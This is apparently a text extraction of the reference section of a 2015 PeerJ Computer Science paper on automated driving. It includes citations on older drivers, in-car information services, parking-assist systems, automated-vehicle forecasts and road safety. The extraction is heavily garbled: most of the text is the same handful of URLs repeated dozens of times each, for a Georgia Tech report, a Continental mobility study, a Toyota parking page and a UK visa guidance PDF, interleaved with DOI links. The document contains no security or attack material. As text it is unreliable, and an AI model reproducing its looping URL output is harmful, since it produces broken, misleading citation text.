https://smartech.gatech.edu/bitstream/handle/1853/3681/92-26.pdf https://smartech.gatech.edu/bitstream/handle/1853/3681/92-26.pdf https://smartech.gatech.edu/bitstream/handle/1853/3681/92-26.pdf https://smartech.gatech.edu/bitstream/handle/1853/3681/92-26.pdf https://smartech.gatech.edu/bitstream/handle/1853/3681/92-26.pdf https://smartech.gatech.edu/bitstream/handle/1853/3681/92-26.pdf https://smartech.gatech.edu/bitstream/handle/1853/3681/92-26.pdf https://smartech.gatech.edu/bitstream/handle/1853/3681/92-26.pdf https://smartech.gatech.edu/bitstream/handle/1853/3681/92-26.pdf https://smartech.gatech.edu/bitstream/handle/1853/3681/92-26.pdf https://smartech.gatech.edu/bitstream/handle/1853/3681/92-26.pdf https://smartech.gatech.edu/bitstream/handle/1853/3681/92-26.pdf https://smartech.gatech.edu/bitstream/handle/1853/3681/92-26.pdf https://smartech.gatech.edu/bitstream/handle/1853/3681/92-26.pdf https://smartech.gatech.edu/bitstream/handle/1853/3681/92-26.pdf https://smartech.gatech.edu/bitstream/handle/1853/3681/92-26.pdf https://smartech.gatech.edu/bitstream/handle/1853/3681/92-26.pdf https://smartech.gatech.edu/bitstream/handle/1853/3681/92-26.pdf https://smartech.gatech.edu/bitstream/handle/1853/3681/92-26.pdf https://smartech.gatech.edu/bitstream/handle/1853/3681/92-26.pdf https://smartech.gatech.edu/bitstream/handle/1853/3681/92-26.pdf https://smartech.gatech.edu/bitstream/handle/1853/3681/92-26.pdf https://smartech.gatech.edu/bitstream/handle/1853/3681/92-26.pdf https://smartech.gatech.edu/bitstream/handle/1853/3681/92-26.pdf https://smartech.gatech.edu/bitstream/handle/1853/3681/92-26.pdf https://smartech.gatech.edu/bitstream/handle/1853/3681/92-26.pdf https://smartech.gatech.edu/bitstream/handle/1853/3681/92-26.pdf https://smartech.gatech.edu/bitstream/handle/1853/3681/92-26.pdf https://smartech.gatech.edu/bitstream/handle/1853/3681/92-26.pdf https://smartech.gatech.edu/bitstream/handle/1853/3681/92-26.pdf https://smartech.gatech.edu/bitstream/handle/1853/3681/92-26.pdf http://dx.doi.org/10.1080/14639220600731123 http://dx.doi.org/10.1098/rstb.1990.0101 http://dx.doi.org/10.1016/j.trf.2014.04.009 http://dx.doi.org/10.1016/j.trf.2004.02.001 http://dx.doi.org/10.1016/0003-6870(95)00054-2 https://www.conti-online.com/www/pressportal_com_en/themes/initiatives/channel_mobility_study_en/ov_mobility_study2013_en/ https://www.conti-online.com/www/pressportal_com_en/themes/initiatives/channel_mobility_study_en/ov_mobility_study2013_en/ https://www.conti-online.com/www/pressportal_com_en/themes/initiatives/channel_mobility_study_en/ov_mobility_study2013_en/ https://www.conti-online.com/www/pressportal_com_en/themes/initiatives/channel_mobility_study_en/ov_mobility_study2013_en/ https://www.conti-online.com/www/pressportal_com_en/themes/initiatives/channel_mobility_study_en/ov_mobility_study2013_en/ https://www.conti-online.com/www/pressportal_com_en/themes/initiatives/channel_mobility_study_en/ov_mobility_study2013_en/ https://www.conti-online.com/www/pressportal_com_en/themes/initiatives/channel_mobility_study_en/ov_mobility_study2013_en/ https://www.conti-online.com/www/pressportal_com_en/themes/initiatives/channel_mobility_study_en/ov_mobility_study2013_en/ https://www.conti-online.com/www/pressportal_com_en/themes/initiatives/channel_mobility_study_en/ov_mobility_study2013_en/ https://www.conti-online.com/www/pressportal_com_en/themes/initiatives/channel_mobility_study_en/ov_mobility_study2013_en/ https://www.conti-online.com/www/pressportal_com_en/themes/initiatives/channel_mobility_study_en/ov_mobility_study2013_en/ https://www.conti-online.com/www/pressportal_com_en/themes/initiatives/channel_mobility_study_en/ov_mobility_study2013_en/ https://www.conti-online.com/www/pressportal_com_en/themes/initiatives/channel_mobility_study_en/ov_mobility_study2013_en/ https://www.conti-online.com/www/pressportal_com_en/themes/initiatives/channel_mobility_study_en/ov_mobility_study2013_en/ https://www.conti-online.com/www/pressportal_com_en/themes/initiatives/channel_mobility_study_en/ov_mobility_study2013_en/ https://www.conti-online.com/www/pressportal_com_en/themes/initiatives/channel_mobility_study_en/ov_mobility_study2013_en/ https://www.conti-online.com/www/pressportal_com_en/themes/initiatives/channel_mobility_study_en/ov_mobility_study2013_en/ https://www.conti-online.com/www/pressportal_com_en/themes/initiatives/channel_mobility_study_en/ov_mobility_study2013_en/ https://www.conti-online.com/www/pressportal_com_en/themes/initiatives/channel_mobility_study_en/ov_mobility_study2013_en/ https://www.conti-online.com/www/pressportal_com_en/themes/initiatives/channel_mobility_study_en/ov_mobility_study2013_en/ https://www.conti-online.com/www/pressportal_com_en/themes/initiatives/channel_mobility_study_en/ov_mobility_study2013_en/ https://www.conti-online.com/www/pressportal_com_en/themes/initiatives/channel_mobility_study_en/ov_mobility_study2013_en/ https://www.conti-online.com/www/pressportal_com_en/themes/initiatives/channel_mobility_study_en/ov_mobility_study2013_en/ https://www.conti-online.com/www/pressportal_com_en/themes/initiatives/channel_mobility_study_en/ov_mobility_study2013_en/ https://www.conti-online.com/www/pressportal_com_en/themes/initiatives/channel_mobility_study_en/ov_mobility_study2013_en/ https://www.conti-online.com/www/pressportal_com_en/themes/initiatives/channel_mobility_study_en/ov_mobility_study2013_en/ https://www.conti-online.com/www/pressportal_com_en/themes/initiatives/channel_mobility_study_en/ov_mobility_study2013_en/ https://www.conti-online.com/www/pressportal_com_en/themes/initiatives/channel_mobility_study_en/ov_mobility_study2013_en/ https://www.conti-online.com/www/pressportal_com_en/themes/initiatives/channel_mobility_study_en/ov_mobility_study2013_en/ https://www.conti-online.com/www/pressportal_com_en/themes/initiatives/channel_mobility_study_en/ov_mobility_study2013_en/ https://www.conti-online.com/www/pressportal_com_en/themes/initiatives/channel_mobility_study_en/ov_mobility_study2013_en/ https://www.conti-online.com/www/pressportal_com_en/themes/initiatives/channel_mobility_study_en/ov_mobility_study2013_en/ https://www.conti-online.com/www/pressportal_com_en/themes/initiatives/channel_mobility_study_en/ov_mobility_study2013_en/ https://www.conti-online.com/www/pressportal_com_en/themes/initiatives/channel_mobility_study_en/ov_mobility_study2013_en/ https://www.conti-online.com/www/pressportal_com_en/themes/initiatives/channel_mobility_study_en/ov_mobility_study2013_en/ https://www.conti-online.com/www/pressportal_com_en/themes/initiatives/channel_mobility_study_en/ov_mobility_study2013_en/ https://www.conti-online.com/www/pressportal_com_en/themes/initiatives/channel_mobility_study_en/ov_mobility_study2013_en/ https://www.conti-online.com/www/pressportal_com_en/themes/initiatives/channel_mobility_study_en/ov_mobility_study2013_en/ https://www.conti-online.com/www/pressportal_com_en/themes/initiatives/channel_mobility_study_en/ov_mobility_study2013_en/ https://www.conti-online.com/www/pressportal_com_en/themes/initiatives/channel_mobility_study_en/ov_mobility_study2013_en/ https://www.conti-online.com/www/pressportal_com_en/themes/initiatives/channel_mobility_study_en/ov_mobility_study2013_en/ https://www.conti-online.com/www/pressportal_com_en/themes/initiatives/channel_mobility_study_en/ov_mobility_study2013_en/ https://www.conti-online.com/www/pressportal_com_en/themes/initiatives/channel_mobility_study_en/ov_mobility_study2013_en/ https://www.conti-online.com/www/pressportal_com_en/themes/initiatives/channel_mobility_study_en/ov_mobility_study2013_en/ https://www.conti-online.com/www/pressportal_com_en/themes/initiatives/channel_mobility_study_en/ov_mobility_study2013_en/ https://www.conti-online.com/www/pressportal_com_en/themes/initiatives/channel_mobility_study_en/ov_mobility_study2013_en/ https://www.conti-online.com/www/pressportal_com_en/themes/initiatives/channel_mobility_study_en/ov_mobility_study2013_en/ https://www.conti-online.com/www/pressportal_com_en/themes/initiatives/channel_mobility_study_en/ov_mobility_study2013_en/ https://www.conti-online.com/www/pressportal_com_en/themes/initiatives/channel_mobility_study_en/ov_mobility_study2013_en/ https://www.conti-online.com/www/pressportal_com_en/themes/initiatives/channel_mobility_study_en/ov_mobility_study2013_en/ https://www.conti-online.com/www/pressportal_com_en/themes/initiatives/channel_mobility_study_en/ov_mobility_study2013_en/ https://www.conti-online.com/www/pressportal_com_en/themes/initiatives/channel_mobility_study_en/ov_mobility_study2013_en/ https://www.conti-online.com/www/pressportal_com_en/themes/initiatives/channel_mobility_study_en/ov_mobility_study2013_en/ https://www.conti-online.com/www/pressportal_com_en/themes/initiatives/channel_mobility_study_en/ov_mobility_study2013_en/ https://www.conti-online.com/www/pressportal_com_en/themes/initiatives/channel_mobility_study_en/ov_mobility_study2013_en/ https://www.conti-online.com/www/pressportal_com_en/themes/initiatives/channel_mobility_study_en/ov_mobility_study2013_en/ https://www.conti-online.com/www/pressportal_com_en/themes/initiatives/channel_mobility_study_en/ov_mobility_study2013_en/ https://www.conti-online.com/www/pressportal_com_en/themes/initiatives/channel_mobility_study_en/ov_mobility_study2013_en/ https://www.conti-online.com/www/pressportal_com_en/themes/initiatives/channel_mobility_study_en/ov_mobility_study2013_en/ https://www.conti-online.com/www/pressportal_com_en/themes/initiatives/channel_mobility_study_en/ov_mobility_study2013_en/ https://www.conti-online.com/www/pressportal_com_en/themes/initiatives/channel_mobility_study_en/ov_mobility_study2013_en/ https://www.conti-online.com/www/pressportal_com_en/themes/initiatives/channel_mobility_study_en/ov_mobility_study2013_en/ https://www.conti-online.com/www/pressportal_com_en/themes/initiatives/channel_mobility_study_en/ov_mobility_study2013_en/ https://www.conti-online.com/www/pressportal_com_en/themes/initiatives/channel_mobility_study_en/ov_mobility_study2013_en/ https://www.conti-online.com/www/pressportal_com_en/themes/initiatives/channel_mobility_study_en/ov_mobility_study2013_en/ https://www.conti-online.com/www/pressportal_com_en/themes/initiatives/channel_mobility_study_en/ov_mobility_study2013_en/ https://www.conti-online.com/www/pressportal_com_en/themes/initiatives/channel_mobility_study_en/ov_mobility_study2013_en/ https://www.conti-online.com/www/pressportal_com_en/themes/initiatives/channel_mobility_study_en/ov_mobility_study2013_en/ https://www.conti-online.com/www/pressportal_com_en/themes/initiatives/channel_mobility_study_en/ov_mobility_study2013_en/ https://www.conti-online.com/www/pressportal_com_en/themes/initiatives/channel_mobility_study_en/ov_mobility_study2013_en/ https://www.conti-online.com/www/pressportal_com_en/themes/initiatives/channel_mobility_study_en/ov_mobility_study2013_en/ https://www.conti-online.com/www/pressportal_com_en/themes/initiatives/channel_mobility_study_en/ov_mobility_study2013_en/ https://www.conti-online.com/www/pressportal_com_en/themes/initiatives/channel_mobility_study_en/ov_mobility_study2013_en/ https://www.conti-online.com/www/pressportal_com_en/themes/initiatives/channel_mobility_study_en/ov_mobility_study2013_en/ https://www.conti-online.com/www/pressportal_com_en/themes/initiatives/channel_mobility_study_en/ov_mobility_study2013_en/ https://www.conti-online.com/www/pressportal_com_en/themes/initiatives/channel_mobility_study_en/ov_mobility_study2013_en/ https://www.conti-online.com/www/pressportal_com_en/themes/initiatives/channel_mobility_study_en/ov_mobility_study2013_en/ https://www.conti-online.com/www/pressportal_com_en/themes/initiatives/channel_mobility_study_en/ov_mobility_study2013_en/ https://www.conti-online.com/www/pressportal_com_en/themes/initiatives/channel_mobility_study_en/ov_mobility_study2013_en/ https://www.conti-online.com/www/pressportal_com_en/themes/initiatives/channel_mobility_study_en/ov_mobility_study2013_en/ https://www.conti-online.com/www/pressportal_com_en/themes/initiatives/channel_mobility_study_en/ov_mobility_study2013_en/ https://www.conti-online.com/www/pressportal_com_en/themes/initiatives/channel_mobility_study_en/ov_mobility_study2013_en/ https://www.conti-online.com/www/pressportal_com_en/themes/initiatives/channel_mobility_study_en/ov_mobility_study2013_en/ https://www.conti-online.com/www/pressportal_com_en/themes/initiatives/channel_mobility_study_en/ov_mobility_study2013_en/ https://www.conti-online.com/www/pressportal_com_en/themes/initiatives/channel_mobility_study_en/ov_mobility_study2013_en/ https://www.conti-online.com/www/pressportal_com_en/themes/initiatives/channel_mobility_study_en/ov_mobility_study2013_en/ https://www.conti-online.com/www/pressportal_com_en/themes/initiatives/channel_mobility_study_en/ov_mobility_study2013_en/ https://www.conti-online.com/www/pressportal_com_en/themes/initiatives/channel_mobility_study_en/ov_mobility_study2013_en/ https://www.conti-online.com/www/pressportal_com_en/themes/initiatives/channel_mobility_study_en/ov_mobility_study2013_en/ https://www.conti-online.com/www/pressportal_com_en/themes/initiatives/channel_mobility_study_en/ov_mobility_study2013_en/ https://www.conti-online.com/www/pressportal_com_en/themes/initiatives/channel_mobility_study_en/ov_mobility_study2013_en/ https://www.conti-online.com/www/pressportal_com_en/themes/initiatives/channel_mobility_study_en/ov_mobility_study2013_en/ https://www.conti-online.com/www/pressportal_com_en/themes/initiatives/channel_mobility_study_en/ov_mobility_study2013_en/ https://www.conti-online.com/www/pressportal_com_en/themes/initiatives/channel_mobility_study_en/ov_mobility_study2013_en/ https://www.conti-online.com/www/pressportal_com_en/themes/initiatives/channel_mobility_study_en/ov_mobility_study2013_en/ https://www.conti-online.com/www/pressportal_com_en/themes/initiatives/channel_mobility_study_en/ov_mobility_study2013_en/ https://www.conti-online.com/www/pressportal_com_en/themes/initiatives/channel_mobility_study_en/ov_mobility_study2013_en/ https://www.conti-online.com/www/pressportal_com_en/themes/initiatives/channel_mobility_study_en/ov_mobility_study2013_en/ https://www.conti-online.com/www/pressportal_com_en/themes/initiatives/channel_mobility_study_en/ov_mobility_study2013_en/ https://www.conti-online.com/www/pressportal_com_en/themes/initiatives/channel_mobility_study_en/ov_mobility_study2013_en/ https://www.conti-online.com/www/pressportal_com_en/themes/initiatives/channel_mobility_study_en/ov_mobility_study2013_en/ https://www.conti-online.com/www/pressportal_com_en/themes/initiatives/channel_mobility_study_en/ov_mobility_study2013_en/ https://www.conti-online.com/www/pressportal_com_en/themes/initiatives/channel_mobility_study_en/ov_mobility_study2013_en/ https://www.conti-online.com/www/pressportal_com_en/themes/initiatives/channel_mobility_study_en/ov_mobility_study2013_en/ https://www.conti-online.com/www/pressportal_com_en/themes/initiatives/channel_mobility_study_en/ov_mobility_study2013_en/ https://www.conti-online.com/www/pressportal_com_en/themes/initiatives/channel_mobility_study_en/ov_mobility_study2013_en/ https://www.conti-online.com/www/pressportal_com_en/themes/initiatives/channel_mobility_study_en/ov_mobility_study2013_en/ https://www.conti-online.com/www/pressportal_com_en/themes/initiatives/channel_mobility_study_en/ov_mobility_study2013_en/ https://www.conti-online.com/www/pressportal_com_en/themes/initiatives/channel_mobility_study_en/ov_mobility_study2013_en/ https://www.conti-online.com/www/pressportal_com_en/themes/initiatives/channel_mobility_study_en/ov_mobility_study2013_en/ https://www.conti-online.com/www/pressportal_com_en/themes/initiatives/channel_mobility_study_en/ov_mobility_study2013_en/ https://www.conti-online.com/www/pressportal_com_en/themes/initiatives/channel_mobility_study_en/ov_mobility_study2013_en/ https://www.conti-online.com/www/pressportal_com_en/themes/initiatives/channel_mobility_study_en/ov_mobility_study2013_en/ https://www.conti-online.com/www/pressportal_com_en/themes/initiatives/channel_mobility_study_en/ov_mobility_study2013_en/ https://www.conti-online.com/www/pressportal_com_en/themes/initiatives/channel_mobility_study_en/ov_mobility_study2013_en/ https://www.conti-online.com/www/pressportal_com_en/themes/initiatives/channel_mobility_study_en/ov_mobility_study2013_en/ https://www.conti-online.com/www/pressportal_com_en/themes/initiatives/channel_mobility_study_en/ov_mobility_study2013_en/ https://www.conti-online.com/www/pressportal_com_en/themes/initiatives/channel_mobility_study_en/ov_mobility_study2013_en/ https://www.conti-online.com/www/pressportal_com_en/themes/initiatives/channel_mobility_study_en/ov_mobility_study2013_en/ https://www.conti-online.com/www/pressportal_com_en/themes/initiatives/channel_mobility_study_en/ov_mobility_study2013_en/ https://www.conti-online.com/www/pressportal_com_en/themes/initiatives/channel_mobility_study_en/ov_mobility_study2013_en/ https://www.conti-online.com/www/pressportal_com_en/themes/initiatives/channel_mobility_study_en/ov_mobility_study2013_en/ http://dx.doi.org/10.1207/S15327566IJCE0503_5 http://dx.doi.org/10.1016/S0925-7535(97)00054-4 http://dx.doi.org/10.1016/j.trf.2014.04.005 http://dx.doi.org/10.1177/0049124112452527 http://dx.doi.org/10.7717/peerj-cs.13 Tacken M, Marcellini F, Mollenkopf H, Ruoppila I, Széman Z. 2005. Use and acceptance of new technology by older people. Findings of the international MOBILATE survey: ‘Enhancing mobility in later life’. Gerontechnology 3:126–137 DOI 10.4017/gt.2005.03.03.002.00. Takayama L, Nass C. 2008. Driver safety and information from afar: an experimental driving simulator study of wireless vs. in-car information services. International Journal of Human Computer Studies 66:173–184 DOI 10.1016/j.ijhcs.2006.06.005. Toyota. 2014. Parking. Available at http://www.toyota-global.com/innovation/safety technology/ safety technology/parking/ (accessed 10 November 2014). UK Visas & Immigration. 2014. Tier 4 of the points based system—policy guidance. Available at https://www.gov.uk/government/uploads/system/uploads/attachment data/file/370866/T4 Guidance 11-14.pdf (accessed 6 February 2015). Underwood S. 2014. Automated vehicles forecast: vehicle symposium opinion survey. In: Paper presented at the automated vehicles symposium 2014, San Francisco, CA. Available at https://drive. google.com/file/d/0B8gGx-CYkV-wREVMTEhHQUxjOWM/edit (accessed 13 July 2015). Varaiya P. 1993. Smart cars on smart roads. Problems of control. IEEE Transactions on Automatic Control 38:195–207 DOI 10.1109/9.250509. Volkswagen. 2014. Park assist. Available at http://www.volkswagen.co.uk/technology/ parking-and-manoeuvring/park-assist (accessed 10 November 2014). Volvo. 2013a. Volvo Car Group reveals world-class safety and support features that will be introduced in the all-new XC9. Available at https://www.media.volvocars.com/global/en-gb/ media/pressreleases/49875/volvo-cars-reveals-world-class-safety-and-support-features-to-be- introduced-in-the-all-new-xc90-in-2 (accessed 7 November 2014). Volvo. 2013b. One million cars with pioneering auto brake technology sold: Volvo Car Group reaches landmark safety milestone. Available at https://www.media.volvocars.com/uk/en-gb/ media/pressreleases/49817 (accessed 13 July 2015). Weber M. 2014. Where to? a history of autonomous vehicles. Available at http://www. computerhistory.org/atchm/where-to-a-history-of-autonomous-vehicles/ (accessed 27 December 2014). Wetmore J. 2003. Driving the dream. The history and motivations behind 60 years of automated highway systems in America. Automotive History Review 7:4–19. Wickens CD, Hollands JG. 2013. Engineering psychology and human performance. New York: HarperCollins Publishers. World Health Organization. 2013. Global status report on road safety 2013. World Health Organization. Available at http://www.who.int/iris/bitstream/10665/78256/1/9789241564564 eng.pdf?ua=1 (accessed 13 July 2015). Yoshida J. 2014. Fully autonomous car? Don’t buy shotgun yet. Available at http://www.eetimes. com/author.asp?section id=36&doc id=1322246 (accessed 17 December 2014). Bazilinskyy and De Winter (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.13 28/28 https://peerj.com/computer-science/ http://dx.doi.org/10.4017/gt.2005.03.03.002.00 http://dx.doi.org/10.1016/j.ijhcs.2006.06.005 http://www.toyota-global.com/innovation/safety_technology/safety_technology/parking/ http://www.toyota-global.com/innovation/safety_technology/safety_technology/parking/ http://www.toyota-global.com/innovation/safety_technology/safety_technology/parking/ http://www.toyota-global.com/innovation/safety_technology/safety_technology/parking/ http://www.toyota-global.com/innovation/safety_technology/safety_technology/parking/ http://www.toyota-global.com/innovation/safety_technology/safety_technology/parking/ http://www.toyota-global.com/innovation/safety_technology/safety_technology/parking/ http://www.toyota-global.com/innovation/safety_technology/safety_technology/parking/ http://www.toyota-global.com/innovation/safety_technology/safety_technology/parking/ http://www.toyota-global.com/innovation/safety_technology/safety_technology/parking/ http://www.toyota-global.com/innovation/safety_technology/safety_technology/parking/ http://www.toyota-global.com/innovation/safety_technology/safety_technology/parking/ http://www.toyota-global.com/innovation/safety_technology/safety_technology/parking/ http://www.toyota-global.com/innovation/safety_technology/safety_technology/parking/ http://www.toyota-global.com/innovation/safety_technology/safety_technology/parking/ http://www.toyota-global.com/innovation/safety_technology/safety_technology/parking/ http://www.toyota-global.com/innovation/safety_technology/safety_technology/parking/ http://www.toyota-global.com/innovation/safety_technology/safety_technology/parking/ http://www.toyota-global.com/innovation/safety_technology/safety_technology/parking/ http://www.toyota-global.com/innovation/safety_technology/safety_technology/parking/ http://www.toyota-global.com/innovation/safety_technology/safety_technology/parking/ http://www.toyota-global.com/innovation/safety_technology/safety_technology/parking/ http://www.toyota-global.com/innovation/safety_technology/safety_technology/parking/ http://www.toyota-global.com/innovation/safety_technology/safety_technology/parking/ http://www.toyota-global.com/innovation/safety_technology/safety_technology/parking/ http://www.toyota-global.com/innovation/safety_technology/safety_technology/parking/ http://www.toyota-global.com/innovation/safety_technology/safety_technology/parking/ http://www.toyota-global.com/innovation/safety_technology/safety_technology/parking/ http://www.toyota-global.com/innovation/safety_technology/safety_technology/parking/ http://www.toyota-global.com/innovation/safety_technology/safety_technology/parking/ http://www.toyota-global.com/innovation/safety_technology/safety_technology/parking/ http://www.toyota-global.com/innovation/safety_technology/safety_technology/parking/ http://www.toyota-global.com/innovation/safety_technology/safety_technology/parking/ http://www.toyota-global.com/innovation/safety_technology/safety_technology/parking/ http://www.toyota-global.com/innovation/safety_technology/safety_technology/parking/ http://www.toyota-global.com/innovation/safety_technology/safety_technology/parking/ http://www.toyota-global.com/innovation/safety_technology/safety_technology/parking/ http://www.toyota-global.com/innovation/safety_technology/safety_technology/parking/ http://www.toyota-global.com/innovation/safety_technology/safety_technology/parking/ http://www.toyota-global.com/innovation/safety_technology/safety_technology/parking/ http://www.toyota-global.com/innovation/safety_technology/safety_technology/parking/ http://www.toyota-global.com/innovation/safety_technology/safety_technology/parking/ http://www.toyota-global.com/innovation/safety_technology/safety_technology/parking/ http://www.toyota-global.com/innovation/safety_technology/safety_technology/parking/ http://www.toyota-global.com/innovation/safety_technology/safety_technology/parking/ http://www.toyota-global.com/innovation/safety_technology/safety_technology/parking/ http://www.toyota-global.com/innovation/safety_technology/safety_technology/parking/ http://www.toyota-global.com/innovation/safety_technology/safety_technology/parking/ http://www.toyota-global.com/innovation/safety_technology/safety_technology/parking/ http://www.toyota-global.com/innovation/safety_technology/safety_technology/parking/ http://www.toyota-global.com/innovation/safety_technology/safety_technology/parking/ http://www.toyota-global.com/innovation/safety_technology/safety_technology/parking/ http://www.toyota-global.com/innovation/safety_technology/safety_technology/parking/ http://www.toyota-global.com/innovation/safety_technology/safety_technology/parking/ http://www.toyota-global.com/innovation/safety_technology/safety_technology/parking/ http://www.toyota-global.com/innovation/safety_technology/safety_technology/parking/ http://www.toyota-global.com/innovation/safety_technology/safety_technology/parking/ http://www.toyota-global.com/innovation/safety_technology/safety_technology/parking/ http://www.toyota-global.com/innovation/safety_technology/safety_technology/parking/ http://www.toyota-global.com/innovation/safety_technology/safety_technology/parking/ http://www.toyota-global.com/innovation/safety_technology/safety_technology/parking/ http://www.toyota-global.com/innovation/safety_technology/safety_technology/parking/ http://www.toyota-global.com/innovation/safety_technology/safety_technology/parking/ http://www.toyota-global.com/innovation/safety_technology/safety_technology/parking/ http://www.toyota-global.com/innovation/safety_technology/safety_technology/parking/ http://www.toyota-global.com/innovation/safety_technology/safety_technology/parking/ http://www.toyota-global.com/innovation/safety_technology/safety_technology/parking/ http://www.toyota-global.com/innovation/safety_technology/safety_technology/parking/ http://www.toyota-global.com/innovation/safety_technology/safety_technology/parking/ http://www.toyota-global.com/innovation/safety_technology/safety_technology/parking/ http://www.toyota-global.com/innovation/safety_technology/safety_technology/parking/ http://www.toyota-global.com/innovation/safety_technology/safety_technology/parking/ http://www.toyota-global.com/innovation/safety_technology/safety_technology/parking/ http://www.toyota-global.com/innovation/safety_technology/safety_technology/parking/ http://www.toyota-global.com/innovation/safety_technology/safety_technology/parking/ http://www.toyota-global.com/innovation/safety_technology/safety_technology/parking/ http://www.toyota-global.com/innovation/safety_technology/safety_technology/parking/ http://www.toyota-global.com/innovation/safety_technology/safety_technology/parking/ http://www.toyota-global.com/innovation/safety_technology/safety_technology/parking/ http://www.toyota-global.com/innovation/safety_technology/safety_technology/parking/ http://www.toyota-global.com/innovation/safety_technology/safety_technology/parking/ http://www.toyota-global.com/innovation/safety_technology/safety_technology/parking/ http://www.toyota-global.com/innovation/safety_technology/safety_technology/parking/ http://www.toyota-global.com/innovation/safety_technology/safety_technology/parking/ https://www.gov.uk/government/uploads/system/uploads/attachment_data/file/370866/T4_Guidance_11-14.pdf https://www.gov.uk/government/uploads/system/uploads/attachment_data/file/370866/T4_Guidance_11-14.pdf https://www.gov.uk/government/uploads/system/uploads/attachment_data/file/370866/T4_Guidance_11-14.pdf https://www.gov.uk/government/uploads/system/uploads/attachment_data/file/370866/T4_Guidance_11-14.pdf https://www.gov.uk/government/uploads/system/uploads/attachment_data/file/370866/T4_Guidance_11-14.pdf https://www.gov.uk/government/uploads/system/uploads/attachment_data/file/370866/T4_Guidance_11-14.pdf https://www.gov.uk/government/uploads/system/uploads/attachment_data/file/370866/T4_Guidance_11-14.pdf https://www.gov.uk/government/uploads/system/uploads/attachment_data/file/370866/T4_Guidance_11-14.pdf https://www.gov.uk/government/uploads/system/uploads/attachment_data/file/370866/T4_Guidance_11-14.pdf https://www.gov.uk/government/uploads/system/uploads/attachment_data/file/370866/T4_Guidance_11-14.pdf https://www.gov.uk/government/uploads/system/uploads/attachment_data/file/370866/T4_Guidance_11-14.pdf https://www.gov.uk/government/uploads/system/uploads/attachment_data/file/370866/T4_Guidance_11-14.pdf https://www.gov.uk/government/uploads/system/uploads/attachment_data/file/370866/T4_Guidance_11-14.pdf https://www.gov.uk/government/uploads/system/uploads/attachment_data/file/370866/T4_Guidance_11-14.pdf https://www.gov.uk/government/uploads/system/uploads/attachment_data/file/370866/T4_Guidance_11-14.pdf https://www.gov.uk/government/uploads/system/uploads/attachment_data/file/370866/T4_Guidance_11-14.pdf https://www.gov.uk/government/uploads/system/uploads/attachment_data/file/370866/T4_Guidance_11-14.pdf https://www.gov.uk/government/uploads/system/uploads/attachment_data/file/370866/T4_Guidance_11-14.pdf https://www.gov.uk/government/uploads/system/uploads/attachment_data/file/370866/T4_Guidance_11-14.pdf https://www.gov.uk/government/uploads/system/uploads/attachment_data/file/370866/T4_Guidance_11-14.pdf https://www.gov.uk/government/uploads/system/uploads/attachment_data/file/370866/T4_Guidance_11-14.pdf https://www.gov.uk/government/uploads/system/uploads/attachment_data/file/370866/T4_Guidance_11-14.pdf https://www.gov.uk/government/uploads/system/uploads/attachment_data/file/370866/T4_Guidance_11-14.pdf https://www.gov.uk/government/uploads/system/uploads/attachment_data/file/370866/T4_Guidance_11-14.pdf https://www.gov.uk/government/uploads/system/uploads/attachment_data/file/370866/T4_Guidance_11-14.pdf https://www.gov.uk/government/uploads/system/uploads/attachment_data/file/370866/T4_Guidance_11-14.pdf https://www.gov.uk/government/uploads/system/uploads/attachment_data/file/370866/T4_Guidance_11-14.pdf https://www.gov.uk/government/uploads/system/uploads/attachment_data/file/370866/T4_Guidance_11-14.pdf https://www.gov.uk/government/uploads/system/uploads/attachment_data/file/370866/T4_Guidance_11-14.pdf https://www.gov.uk/government/uploads/system/uploads/attachment_data/file/370866/T4_Guidance_11-14.pdf https://www.gov.uk/government/uploads/system/uploads/attachment_data/file/370866/T4_Guidance_11-14.pdf https://www.gov.uk/government/uploads/system/uploads/attachment_data/file/370866/T4_Guidance_11-14.pdf https://www.gov.uk/government/uploads/system/uploads/attachment_data/file/370866/T4_Guidance_11-14.pdf https://www.gov.uk/government/uploads/system/uploads/attachment_data/file/370866/T4_Guidance_11-14.pdf https://www.gov.uk/government/uploads/system/uploads/attachment_data/file/370866/T4_Guidance_11-14.pdf https://www.gov.uk/government/uploads/system/uploads/attachment_data/file/370866/T4_Guidance_11-14.pdf https://www.gov.uk/government/uploads/system/uploads/attachment_data/file/370866/T4_Guidance_11-14.pdf https://www.gov.uk/government/uploads/system/uploads/attachment_data/file/370866/T4_Guidance_11-14.pdf https://www.gov.uk/government/uploads/system/uploads/attachment_data/file/370866/T4_Guidance_11-14.pdf https://www.gov.uk/government/uploads/system/uploads/attachment_data/file/370866/T4_Guidance_11-14.pdf https://www.gov.uk/government/uploads/system/uploads/attachment_data/file/370866/T4_Guidance_11-14.pdf https://www.gov.uk/government/uploads/system/uploads/attachment_data/file/370866/T4_Guidance_11-14.pdf https://www.gov.uk/government/uploads/system/uploads/attachment_data/file/370866/T4_Guidance_11-14.pdf https://www.gov.uk/government/uploads/system/uploads/attachment_data/file/370866/T4_Guidance_11-14.pdf https://www.gov.uk/government/uploads/system/uploads/attachment_data/file/370866/T4_Guidance_11-14.pdf https://www.gov.uk/government/uploads/system/uploads/attachment_data/file/370866/T4_Guidance_11-14.pdf https://www.gov.uk/government/uploads/system/uploads/attachment_data/file/370866/T4_Guidance_11-14.pdf https://www.gov.uk/government/uploads/system/uploads/attachment_data/file/370866/T4_Guidance_11-14.pdf https://www.gov.uk/government/uploads/system/uploads/attachment_data/file/370866/T4_Guidance_11-14.pdf https://www.gov.uk/government/uploads/system/uploads/attachment_data/file/370866/T4_Guidance_11-14.pdf https://www.gov.uk/government/uploads/system/uploads/attachment_data/file/370866/T4_Guidance_11-14.pdf https://www.gov.uk/government/uploads/system/uploads/attachment_data/file/370866/T4_Guidance_11-14.pdf https://www.gov.uk/government/uploads/system/uploads/attachment_data/file/370866/T4_Guidance_11-14.pdf https://www.gov.uk/government/uploads/system/uploads/attachment_data/file/370866/T4_Guidance_11-14.pdf https://www.gov.uk/government/uploads/system/uploads/attachment_data/file/370866/T4_Guidance_11-14.pdf https://www.gov.uk/government/uploads/system/uploads/attachment_data/file/370866/T4_Guidance_11-14.pdf https://www.gov.uk/government/uploads/system/uploads/attachment_data/file/370866/T4_Guidance_11-14.pdf https://www.gov.uk/government/uploads/system/uploads/attachment_data/file/370866/T4_Guidance_11-14.pdf https://www.gov.uk/government/uploads/system/uploads/attachment_data/file/370866/T4_Guidance_11-14.pdf https://www.gov.uk/government/uploads/system/uploads/attachment_data/file/370866/T4_Guidance_11-14.pdf https://www.gov.uk/government/uploads/system/uploads/attachment_data/file/370866/T4_Guidance_11-14.pdf 